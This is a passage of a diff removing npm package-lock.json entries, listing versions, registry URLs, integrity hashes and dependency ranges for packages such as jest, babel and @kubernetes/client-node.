"https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", - "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/globals": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", - "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/types": "^29.6.3", - "jest-mock": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/reporters": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", - "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^6.0.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/schemas": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", - "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.27.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/source-map": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", - "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-result": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", - "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-sequencer": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", - "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/transform": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", - "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", - "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.5", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", - "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.2.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.24" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/set-array": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.25", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", - "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", - "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "^3.1.0", - "@jridgewell/sourcemap-codec": "^1.4.14" - } - }, - "node_modules/@jsep-plugin/assignment": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", - "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", - "engines": { - "node": ">= 10.16.0" - }, - "peerDependencies": { - "jsep": "^0.4.0||^1.0.0" - } - }, - "node_modules/@jsep-plugin/regex": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", - "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", - "engines": { - "node": ">= 10.16.0" - }, - "peerDependencies": { - "jsep": "^0.4.0||^1.0.0" - } - }, - "node_modules/@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", - "dependencies": { - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" - }, - "optionalDependencies": { - "openid-client": "^6.1.3" - } - }, - "node_modules/@kubernetes/client-node/node_modules/argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "node_modules/@kubernetes/client-node/node_modules/js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "dependencies": { - "argparse": "^2.0.1" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true, - "engines": { - "node": ">=14" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", - "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", - "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.8", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", - "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.4", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", - "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__traverse": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.5.tgz", - "integrity": "sha512-WXCyOcRtH37HAUkpXhUduaxdm82b4GSlyTqajXviN4EfiuPgNYR109xMCKvpl6zPIpua0DGlMEDCq+g8EdoheQ==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" - } - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.9", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", - "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.3.tgz", - "integrity": "sha512-sz7iLqvVUg1gIedBOvlkxPlc8/uVzyS5OwGz1cKjXzkl3FpL3al0crU8YGU1WoHkxn0Wxbw5tyi6hvzJKNzFsw==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/jest": { - "version": "29.5.14", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.14.tgz", - "integrity": "sha512-ZN+4sdnLUbo8EVvVc2ao0GFW6oVrQRPn4K2lglySj7APvSrgzxHiNNK99us4WDMi57xxA2yggblIAMNhXOotLQ==", - "dev": true, - "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "node_modules/@types/node": { - "version": "22.10.2", - "resolved": "https://registry.npmjs.org/@types/node/-/node-22.10.2.tgz", - "integrity": "sha512-Xxr6BBRCAOQixvonOye19wnzyDiUtTeqldOOmj3CkeblonbccA12PFwlufvRdrpjXxqnmUaeiU5EOA+7s5diUQ==", - "dev": true, - "dependencies": { - "undici-types": "~6.20.0" - } - }, - "node_modules/@types/parse-json": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/parse-json/-/parse-json-4.0.2.tgz", - "integrity": "sha512-dISoDXWWQwUquiKsyZ4Ng+HX2KsPL7LyHKHQwgGFEA3IaKac4Obd+h2a/a6waisAoepJlBcx9paWqjA8/HVjCw==", - "dev": true - }, - "node_modules/@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true, - "optional": true, - "peer": true - }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "20.2.1", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-20.2.1.tgz", - "integrity": "sha512-7tFImggNeNBVMsn0vLrpn1H1uPrUBdnARPTpZoitY37ZrdJREzf7I16tMrlK3hen349gr1NYh8CmZQa7CTG6Aw==", - "dev": true - }, - "node_modules/acorn": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/acorn/-/acorn-7.4.1.tgz", - "integrity": "sha512-nQyp0o1/mNdbTO1PO6kHkwSrmgZ0MT/jCCpNiwbUjGoRN4dlBhqJtoQuCnEOKzgTVwg0ZWiCoQy6SxMebQVh8A==", - "dev": true, - "peer": true, - "bin": { - "acorn": "bin/acorn" - }, - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/acorn-jsx": { - "version": "5.3.2", - "resolved": "https://registry.npmjs.org/acorn-jsx/-/acorn-jsx-5.3.2.tgz", - "integrity": "sha512-rq9s+JNhf0IChjtDXxllJ7g41oZk5SlXtp0LHwyA5cejwn7vKmKp4pPri6YEePv2PU65sAsegbXtIinmDFDXgQ==", - "dev": true, - "peer": true, - "peerDependencies": { - "acorn": "^6.0.0 || ^7.0.0 || ^8.0.0" - } - }, - "node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" - } - }, - "node_modules/ansi-colors": { - "version": "4.1.1", - "resolved": "https://registry.npmjs.org/ansi-colors/-/ansi-colors-4.1.1.tgz", - "integrity": "sha512-JoX0apGbHaUJBNl6yF+p6JAFYZ666/hhCGKN5t9QFjbJQKUU/g8MNbFDbvfrgKXvI1QpZplPOnwIo99lX/AAmA==", - "dev": true, - "peer": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-escapes/node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" - } - }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } - }, - "node_modules/asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", - "engines": { - "node": ">=0.8" - } - }, - "node_modules/astral-regex": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/astral-regex/-/astral-regex-2.0.0.tgz", - "integrity": "sha512-Z7tMw1ytTXt5jqMcOP+OQteU1VuNK9Y02uuJtKQ1Sv69jXQKKg5cibLwGJow8yzZP+eAc18EmLGPal0bp36rvQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/async": { - "version": "3.2.5", - "resolved": "https://registry.npmjs.org/async/-/async-3.2.5.tgz", - "integrity": "sha512-baNZyqaaLhyLVKm/DlvdW051MSgO6b8eVfIezl9E5PqWxFgzLm/wQntEW4zOytVburDEr0JlALEpdOFwvErLsg==", - "dev": true - }, - "node_modules/asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" - }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", - "engines": { - "node": "*" - } - }, - "node_modules/aws4": { - "version": "1.12.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", - "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" - }, - "node_modules/babel-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", - "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.7.0", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.6.3", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-istanbul/node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-istanbul/node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", - "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": 